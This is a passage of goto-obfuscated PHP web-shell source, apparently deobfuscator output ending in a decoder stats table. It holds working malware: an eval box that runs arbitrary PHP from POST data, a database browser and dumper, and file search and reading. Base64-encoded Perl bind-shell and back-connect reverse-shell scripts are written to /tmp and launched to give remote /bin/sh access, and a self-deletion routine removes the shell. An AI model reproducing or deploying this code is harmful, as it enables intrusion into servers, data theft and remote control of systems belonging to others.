(is_int($v)) { $item[$k] = $v; } else { $item[$k] = "'" . @mysql_real_escape_string($v) . "'"; } goto E7efd; C04a5: } goto d1317; B8b32: af70a: goto Dd8ea; beca8: if ($head) { $sql .= 'INSERT INTO `' . $table . '` (' . implode(", ", $columns) . ") VALUES \n\t(" . implode(", ", $item) . ')'; $head = false; } else { $sql .= "\n\t,(" . implode(", ", $item) . ')'; } goto cd11d; e721f: $head = true; goto B8b32; F8cdb: $sql = ''; goto ec8fe; cd11d: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto b77a9; a2fa7: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto B1b73; cc377: $columns = array(); goto E4552; f3f1e: $res = $this->query('SHOW CREATE TABLE `' . $table . '`'); goto Ea45b; A5d7e: case 'pgsql': goto Bc2fa; A5c5a: goto d9583; goto cbbc5; eea63: $columns = array(); goto db8eb; B232f: Ec90a: goto B8d51; E517a: Fbc09: goto A5c5a; Bb2e5: $sql = 'INSERT INTO ' . $table . ' (' . implode(", ", $columns) . ') VALUES (' . implode(", ", $item) . ');' . "\n"; goto de295; db8eb: foreach ($item as $k => $v) { goto Ca7d5; Ca7d5: $item[$k] = "'" . addslashes($v) . "'"; goto A6901; A6901: $columns[] = $k; goto b954d; b954d: D3224: goto d8adc; d8adc: } goto A0f63; B8d51: if (!($item = $this->fetch())) { goto Fbc09; } goto eea63; de295: if ($fp) { fwrite($fp, $sql); } else { echo $sql; } goto b6934; A0f63: f272f: goto Bb2e5; Bc2fa: $this->query('SELECT * FROM ' . $table); goto B232f; b6934: goto Ec90a; goto E517a; cbbc5: } goto Bc1d6; fc0e3: } } goto Fd048; f27b0: if (@$_POST['type'] == 'pgsql') { echo 'selected'; } goto b9260; Fd048: $db = new DbClass($_POST['type']); goto bf653; ecfe1: if (@$_POST['type'] == 'mysql') { echo 'selected'; } goto B93e3; cd62e: echo '</div>'; goto A793f; A793f: adugxFooter(); goto B0b4f; Facdd: if (isset($db) && $db->link) { goto b500a; b500a: echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; goto bea6e; e274f: if ($_POST['type'] == 'mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if ($db->fetch()) { echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } } goto E26c7; bea6e: if (!empty($_POST['sql_base'])) { goto a2bdf; a5b91: echo "</textarea><br/><input type=submit value='Execute'>"; goto e0ef8; aa860: ed9ba: goto d5157; bc30f: $tbls_res = $db->listTables(); goto aa860; a2bdf: $db->selectdb($_POST['sql_base']); goto B57ba; Cd259: list($key, $value) = each($item); goto b2fdc; eb50e: $value = htmlspecialchars($value); goto d1102; Baaa1: if (@$_POST['p1'] == 'query' && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if ($db->res !== false) { goto d3690; f8604: $line = $line == 1 ? 2 : 1; goto Dbe29; a7447: echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; goto dba0e; c9955: if (!$title) { goto Fd9e7; Cc779: $line = 2; goto B42d1; a4de1: F7435: goto d7b8b; Bdc39: echo '</tr><tr>'; goto Cc779; Fd9e7: echo '<tr>'; goto D661e; d7b8b: reset($item); goto Be7c8; D661e: foreach ($item as $key => $value) { echo '<th>' . $key . '</th>'; Dccc9: } goto a4de1; Be7c8: $title = true; goto Bdc39; B42d1: } goto Bf274; f61f9: E2892: goto f5bec; dba0e: $line = 1; goto Ec809; a54b6: echo '</tr>'; goto Da323; d3690: $title = false; goto a7447; Bf274: echo '<tr class="l' . $line . '">'; goto f8604; Dbe29: foreach ($item as $key => $value) { if ($value == null) { echo '<td><i>null</i></td>'; } else { echo '<td>' . nl2br(htmlspecialchars($value)) . '</td>'; } B217f: } goto e6141; Ec809: B648a: goto E89f1; f5bec: echo '</table>'; goto dd9f1; E89f1: if (!($item = $db->fetch())) { goto E2892; } goto c9955; Da323: goto B648a; goto f61f9; e6141: Eea50: goto a54b6; dd9f1: } else { echo '<div><b>Error:</b> ' . htmlspecialchars($db->error()) . '</div>'; } } goto B9052; eb081: echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; goto d0ab0; d0ab0: if (@$_POST['p1'] == 'select') { goto ed9cc; d5f6f: echo " of {$pages}"; goto Bd888; D8448: $num = $db->fetch(); goto c123b; A3349: echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>" . $_POST['p2'] . "</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . (int) $_POST['p3'] . ">"; goto d5f6f; aee99: echo "<br><br>"; goto dfe6d; ee436: $_POST['p3']--; goto F1ad2; f93ab: $_POST['p3'] = $_POST['p3'] ? $_POST['p3'] : 1; goto A0824; ba5d8: if ($_POST['p3'] < $pages) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] + 1) . ")'>Next ></a>"; } goto ee436; A0824: $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); goto D8448; Bd888: if ($_POST['p3'] > 1) { echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3'] - 1) . ")'>< Prev</a>"; } goto ba5d8; F1ad2: if ($_POST['type'] == 'pgsql') { $_POST['p2'] = 'SELECT * FROM ' . $_POST['p2'] . ' LIMIT 30 OFFSET ' . $_POST['p3'] * 30; } else { $_POST['p2'] = 'SELECT * FROM `' . $_POST['p2'] . '` LIMIT ' . $_POST['p3'] * 30 . ',30'; } goto aee99; ed9cc: $_POST['p1'] = 'query'; goto f93ab; c123b: $pages = ceil($num['n'] / 30); goto A3349; dfe6d: } goto Baaa1; B57ba: echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; goto bc30f; d5157: if (!($item = $db->fetch($tbls_res))) { goto ce1c0; } goto Cd259; e0ef8: echo "</td></tr>"; goto B5855; Be6c9: ce1c0: goto eb081; b2fdc: if (!empty($_POST['sql_count'])) { $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM ' . $value . '')); } goto eb50e; B9052: echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; goto d9f3f; bea51: goto ed9ba; goto Be6c9; d1102: echo "<nobr><input type='checkbox' name='tbl[]' value='" . $value . "'> <a href=# onclick=\"st('" . $value . "',1)\">" . $value . "</a>" . (empty($_POST['sql_count']) ? ' ' : " <small>({$n['n']})</small>") . "</nobr><br>"; goto bea51; d9f3f: if (!empty($_POST['p2']) && $_POST['p1'] != 'loadfile') { echo htmlspecialchars($_POST['p2']); } goto a5b91; B5855: } goto E8cbc; E26c7: if (@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>' . htmlspecialchars($file['file']) . '</pre>'; } goto E39a3; E8cbc: echo "</table></form><br/>"; goto e274f; E39a3: } else { echo htmlspecialchars($db->error()); } goto cd62e; f39cd: adugxHeader(); goto bac27; bac27: echo "\r\n<h1>Sql browser</h1><div class=content>\r\n<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>\r\n<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>\r\n<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) . "'><input type=hidden name=charset value='" . (isset($_POST['charset']) ? $_POST['charset'] : '') . "'>\r\n<td><select name='type'><option value='mysql' "; goto ecfe1; bf653: if (@$_POST['p2'] == 'download' && @$_POST['p1'] != 'select') { goto Cf091; Cf091: $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); goto a0072; a7413: F832d: goto F7464; a0072: $db->selectdb($_POST['sql_base']); goto F27b6; Ecd50: Cc4f6: goto a7413; F7464: if (empty($_POST['file'])) { goto a60a4; c3d93: exit; goto c2670; ebad0: foreach ($_POST['tbl'] as $v) { $db->dump($v); Ad580: } goto c1bfe; c1bfe: f2726: goto c3d93; a60a4: ob_start("ob_gzhandler", 4096); goto f4c6b; b5f4a: header("Content-Type: text/plain"); goto ebad0; f4c6b: header("Content-Disposition: attachment; filename=dump.sql"); goto b5f4a; c2670: } elseif ($fp = @fopen($_POST['file'], 'w')) { goto A97b3; A97b3: foreach ($_POST['tbl'] as $v) { $db->dump($v, $fp); D5783: } goto F617c; b69e0: fclose($fp); goto a0e61; a0e61: unset($_POST['p2']); goto c0a55; F617c: F6c6e: goto b69e0; c0a55: } else { die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } goto da650; F27b6: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto F832d; case "UTF-8": $db->setCharset('utf8'); goto F832d; case "KOI8-R": $db->setCharset('koi8r'); goto F832d; case "KOI8-U": $db->setCharset('koi8u'); goto F832d; case "cp866": $db->setCharset('cp866'); goto F832d; } goto Ecd50; da650: } goto f39cd; B93e3: echo ">MySql</option><option value='pgsql' "; goto f27b0; C86f1: if (isset($_POST['sql_host'])) { if ($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { goto B3150; F4a3b: echo '<option value="' . $value . '" ' . ($value == $_POST['sql_base'] ? 'selected' : '') . '>' . $value . '</option>'; goto fb96f; fb96f: goto b6f39; goto Facd7; Bba48: echo "<select name=sql_base><option value=''></option>"; goto fd61c; B3150: switch ($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); goto e326c; case "UTF-8": $db->setCharset('utf8'); goto e326c; case "KOI8-R": $db->setCharset('koi8r'); goto e326c; case "KOI8-U": $db->setCharset('koi8u'); goto e326c; case "cp866": $db->setCharset('cp866'); goto e326c; } goto d712b; E7131: if (!($item = $db->fetch())) { goto fcf60; } goto f69a4; fd61c: b6f39: goto E7131; Aa5dd: $db->listDbs(); goto Bba48; f69a4: list($key, $value) = each($item); goto F4a3b; Facd7: fcf60: goto b7b46; b7b46: echo '</select>'; goto E0623; d1475: e326c: goto Aa5dd; d712b: e95a9: goto d1475; E0623: } else { echo $tmp; } } else { echo $tmp; } goto C3e0e; B0b4f: } goto Caaa5; D9101: $home_cwd = @getcwd(); goto e1f11; E5a36: function actionSelfRemove() { goto Dc5e5; Dc5e5: if ($_POST['p1'] == 'yes') { if (@unlink(preg_replace('!\\(\\d+\\)\\s.*!', '', __FILE__))) { die('Shell has been removed'); } else { echo 'unlink error!'; } } goto C0e4b; Fb79d: adugxFooter(); goto d7225; c3e46: echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; goto Fb79d; C0e4b: if ($_POST['p1'] != 'yes') { adugxHeader(); } goto c3e46; d7225: } goto D0d0c; Ce628: function actionStringTools() { goto D50e4; D50e4: if (!function_exists('hex2bin')) { function hex2bin($p) { return decbin(hexdec($p)); } } goto A30f0; Ee9f5: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto B0d0e; D5c4a: echo "</pre></div><br><h1>Search files:</h1><div class=content>\r\n\t\t<form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>\r\n\t\t\t<tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Path:</td><td><input type='text' name='cwd' value='" . htmlspecialchars($GLOBALS['cwd']) . "' style='width:100%'></td></tr>\r\n\t\t\t<tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>\r\n\t\t\t<tr><td></td><td><input type='submit' value='>>'></td></tr>\r\n\t\t\t</table></form>"; goto a31d1; cffa5: $stringTools = array('Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen'); goto b4b87; Eb1fc: foreach ($stringTools as $k => $v) { echo "<option value='" . htmlspecialchars($v) . "'>" . $k . "</option>"; Ce880: } goto Eb080; b4b87: if (isset($_POST['ajax'])) { goto B5649; Dac27: ob_start(); goto E0009; E0009: if (in_array($_POST['p1'], $stringTools)) { echo $_POST['p1']($_POST['p2']); } goto b1c04; b1c04: $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto bb313; E162c: exit; goto Ddd21; bb313: echo strlen($temp), "\n", $temp; goto E162c; B5649: adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto Dac27; Ddd21: } goto Ee9f5; a7ab6: echo '<h1>String conversions</h1><div class=content>'; goto c336b; B0d0e: adugxHeader(); goto a7ab6; A8ef7: echo "</div><br><h1>Search for hash:</h1><div class=content>\r\n\t\t<form method='post' target='_blank' name='hf'>\r\n\t\t\t<input type='text' name='hash' style='width:200px;'><br>\r\n <input type='hidden' name='act' value='find'/>\r\n\t\t\t<input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>\r\n\t\t\t<input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>\r\n <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>\r\n\t\t</form></div>"; goto c5fd7; Fcd68: if (!function_exists('hex2ascii')) { function hex2ascii($p) { goto F4fbe; A658f: $r .= chr(hexdec($p[$i] . $p[$i + 1])); goto Aee9b; F4fbe: $r = ''; goto b27ec; a1b5f: goto C92ff; goto D5d92; F8dec: if (!($i < strLen($p))) { goto c2310; } goto A658f; F0121: return $r; goto E8acd; b27ec: $i = 0; goto a1ff5; Aee9b: c32bb: goto B2299; D5d92: c2310: goto F0121; a1ff5: C92ff: goto F8dec; B2299: $i += 2; goto a1b5f; E8acd: } } goto C8326; C8326: if (!function_exists('ascii2hex')) { function ascii2hex($p) { goto eadf4; Bd3a2: $r .= sprintf('%02X', ord($p[$i])); goto e324d; eb78e: $i = 0; goto B5f1d; b163e: return strtoupper($r); goto F7442; e324d: ea61b: goto e5d80; eadf4: $r = ''; goto eb78e; bf828: a2fe5: goto b163e; Dd1f8: if (!($i < strlen($p))) { goto a2fe5; } goto Bd3a2; B5f1d: ee202: goto Dd1f8; ae17c: goto ee202; goto bf828; e5d80: ++$i; goto ae17c; F7442: } } goto d08ac; c5fd7: adugxFooter(); goto c7b05; E3fbe: if (!empty($_POST['p1'])) { if (in_array($_POST['p1'], $stringTools)) { echo htmlspecialchars($_POST['p1']($_POST['p2'])); } } goto D5c4a; Eb080: Efb02: goto b15eb; A30f0: if (!function_exists('binhex')) { function binhex($p) { return dechex(bindec($p)); } } goto Fcd68; b15eb: echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 " . (@$_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . "> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>" . (empty($_POST['p1']) ? '' : htmlspecialchars(@$_POST['p2'])) . "</textarea></form><pre class='ml1' style='" . (empty($_POST['p1']) ? 'display:none;' : '') . "margin-top:5px' id='strOutput'>"; goto E3fbe; b6b7f: if (@$_POST['p3']) { adugxRecursiveGlob($_POST['c']); } goto A8ef7; d08ac: if (!function_exists('full_urlencode')) { function full_urlencode($p) { goto f8c4d; Ff0bb: $r .= '%' . dechex(ord($p[$i])); goto E6f62; d9a76: ++$i; goto f8cc9; f7614: $i = 0; goto e9f96; e37fa: return strtoupper($r); goto a1f66; C00d1: Ee174: goto e37fa; E6f62: f7685: goto d9a76; f8c4d: $r = ''; goto f7614; f8cc9: goto Cbeb6; goto C00d1; e9f96: Cbeb6: goto c2f1f; c2f1f: if (!($i < strlen($p))) { goto Ee174; } goto Ff0bb; a1f66: } } goto cffa5; c336b: echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; goto Eb1fc; a31d1: function adugxRecursiveGlob($path) { goto c3f4b; Ee16d: if (is_array($paths) && @count($paths)) { foreach ($paths as $item) { if (@is_dir($item)) { if ($path != $item) { adugxRecursiveGlob($item); } } else { if (empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2']) !== false) { echo "<a href='#' onclick='g(\"FilesTools\",null,\"" . urlencode($item) . "\", \"view\",\"\")'>" . htmlspecialchars($item) . "</a><br>"; } } C596b: } f1021: } goto bf8d8; a5af7: $paths = @array_unique(@array_merge(@glob($path . $_POST['p3']), @glob($path . '*', GLOB_ONLYDIR))); goto Ee16d; c3f4b: if (substr($path, -1) != '/') { $path .= '/'; } goto a5af7; bf8d8: } goto b6b7f; c7b05: } goto C0045; ca9db: if (!$safe_mode) { error_reporting(0); } goto a7fa4; B0e97: @ini_set('log_errors', 0); goto f4602; ee956: $auth_pass = ""; goto d9dfc; ffd4b: function actionPhp() { goto b00c1; b00c1: if (isset($_POST['ajax'])) { goto a7526; d2b57: $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='" . addcslashes(htmlspecialchars(ob_get_clean()), "\n\r\t\\'\0") . "';\n"; goto A6cce; E1d4b: ob_start(); goto c5835; c5835: eval($_POST['p1']); goto d2b57; A6cce: echo strlen($temp), "\n", $temp; goto Df3e1; Df3e1: exit; goto Dbada; a7526: adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', true); goto E1d4b; Dbada: } goto b1d83; D65a0: echo ' <input type=checkbox name=ajax value=1 ' . ($_COOKIE[md5($_SERVER['HTTP_HOST']) . 'ajax'] ? 'checked' : '') . '> send using AJAX</form><pre id=PhpOutput style="' . (empty($_POST['p1']) ? 'display:none;' : '') . 'margin-top:5px;" class=ml1>'; goto Dc630; E3edc: adugxHeader(); goto b2afc; b1d83: if (empty($_POST['ajax']) && !empty($_POST['p1'])) { adugxsetcookie(md5($_SERVER['HTTP_HOST']) . 'ajax', 0); } goto E3edc; Dc630: if (!empty($_POST['p1'])) { goto D6a44; D6a44: ob_start(); goto Cef47; e8588: echo htmlspecialchars(ob_get_clean()); goto B2e49; Cef47: eval($_POST['p1']); goto e8588; B2e49: } goto f5bf6; e5a95: echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(\'Php\',null,this.code.value);}else{g(\'Php\',null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>' . (!empty($_POST['p1']) ? htmlspecialchars($_POST['p1']) : '') . '</textarea><input type=submit value=Eval style="margin-top:5px">'; goto D65a0; a6883: adugxFooter(); goto B958c; b2afc: if (isset($_POST['p2']) && $_POST['p2'] == 'info') { goto B158e; B277b: phpinfo(); goto Db583; B158e: echo '<h1>PHP info</h1><div class=content><style>.p {color:#000;}</style>'; goto a38fe; dcbd2: $tmp = preg_replace(array('!(body|a:\\w+|body, td, th, h1, h2) {.*}!msiU', '!td, th {(.*)}!msiU', '!<img[^>]+>!msiU'), array('', '.e, .v, .h, .h th {$1}', ''), $tmp); goto b8241; Db583: $tmp = ob_get_clean(); goto dcbd2; a38fe: ob_start(); goto B277b; b8241: echo str_replace('<h1', '<h2', $tmp) . '</div><br>'; goto Dca58; Dca58: } goto e5a95; f5bf6: echo '</pre></div>'; goto a6883; B958c: } goto c4a11; Caaa5: function actionNetwork() { goto fe95b; F0376: echo '</div>'; goto A94fc; db2f4: $back_connect_p = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; goto C2dc6; C2dc6: $bind_port_p = "IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; goto F8a36; fe95b: adugxHeader(); goto db2f4; C22d0: if (isset($_POST['p1'])) { goto Ea939; aac85: if ($_POST['p1'] == 'bcp') { goto d65f1; C8976: sleep(1); goto a6b53; cd5b6: unlink("/tmp/bc.pl"); goto f99b5; d65f1: cf("/tmp/bc.pl", $back_connect_p); goto Bf3b0; a6b53: echo "<pre class=ml1>{$out}\n" . adugxEx("ps aux | grep bc.pl") . "</pre>"; goto cd5b6; Bf3b0: $out = adugxEx("perl /tmp/bc.pl " . $_POST['p2'] . " " . $_POST['p3'] . " 1>/dev/null 2>&1 &"); goto C8976; f99b5: } goto ab70c; cca69: if ($_POST['p1'] == 'bpp') { goto e5378; e5378: cf("/tmp/bp.pl", $bind_port_p); goto Eef75; c38d5: echo "<pre class=ml1>{$out}\n" . adugxEx("ps aux | grep bp.pl") . "</pre>"; goto E8097; C46ae: sleep(1); goto c38d5; Eef75: $out = adugxEx("perl /tmp/bp.pl " . $_POST['p2'] . " 1>/dev/null 2>&1 &"); goto C46ae; E8097: unlink("/tmp/bp.pl"); goto A1781; A1781: } goto aac85; Ea939: function cf($f, $t) { $w = @fopen($f, "w") or @function_exists('file_put_contents'); if ($w) { @fwrite($w, @base64_decode($t)); @fclose($w); } } goto cca69; ab70c: } goto F0376; F8a36: echo "<h1>Network tools</h1><div class=content>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bpp',this.port.value);return false;\">\r\n\t<span>Bind port to /bin/sh [perl]</span><br/>\r\n\tPort: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form>\r\n\t<form name='nfp' onSubmit=\"g(null,null,'bcp',this.server.value,this.port.value);return false;\">\r\n\t<span>Back-connect [perl]</span><br/>\r\n\tServer: <input type='text' name='server' value='" . $_SERVER['REMOTE_ADDR'] . "'> Port: <input type='text' name='port' value='31337'> <input type=submit value='>>'>\r\n\t</form><br>"; goto C22d0; A94fc: adugxFooter(); goto Ad3eb; Ad3eb: } goto b0b4b; aaa81: function adugxPerms($p) { goto Fb1cb; df761: $i .= $p & 0x80 ? 'w' : '-'; goto Bc736; aafa4: $i .= $p & 0x8 ? $p & 0x400 ? 's' : 'x' : ($p & 0x400 ? 'S' : '-'); goto B27f6; Ee892: return $i; goto C769d; d1b2f: $i .= $p & 0x100 ? 'r' : '-'; goto df761; d1bf7: $i .= $p & 0x1 ? $p & 0x200 ? 't' : 'x' : ($p & 0x200 ? 'T' : '-'); goto Ee892; fd782: $i .= $p & 0x2 ? 'w' : '-'; goto d1bf7; Bc736: $i .= $p & 0x40 ? $p & 0x800 ? 's' : 'x' : ($p & 0x800 ? 'S' : '-'); goto ba002; B27f6: $i .= $p & 0x4 ? 'r' : '-'; goto fd782; Fb1cb: if (($p & 0xc000) == 0xc000) { $i = 's'; } elseif (($p & 0xa000) == 0xa000) { $i = 'l'; } elseif (($p & 0x8000) == 0x8000) { $i = '-'; } elseif (($p & 0x6000) == 0x6000) { $i = 'b'; } elseif (($p & 0x4000) == 0x4000) { $i = 'd'; } elseif (($p & 0x2000) == 0x2000) { $i = 'c'; } elseif (($p & 0x1000) == 0x1000) { $i = 'p'; } else { $i = 'u'; } goto d1b2f; ba002: $i .= $p & 0x20 ? 'r' : '-'; goto Abea9; Abea9: $i .= $p & 0x10 ? 'w' : '-'; goto aafa4; C769d: } goto f4fd4; cdc37: if (!function_exists("posix_getpwuid") && strpos($GLOBALS['disable_functions'], 'posix_getpwuid') === false) { function posix_getpwuid($p) { return false; } } goto E1797; Ba635: if (empty($_POST['a'])) { if (isset($default_action) && function_exists('action' . $default_action)) { $_POST['a'] = $default_action; } else { $_POST['a'] = 'SecInfo'; } } goto a676a; A1bb1: exit;Function Calls
| None |
Stats
| MD5 | bb932faca0cf2d1d8e1dc41b7dccdbe3 |
| Eval Count | 0 |
| Decode Time | 232 ms |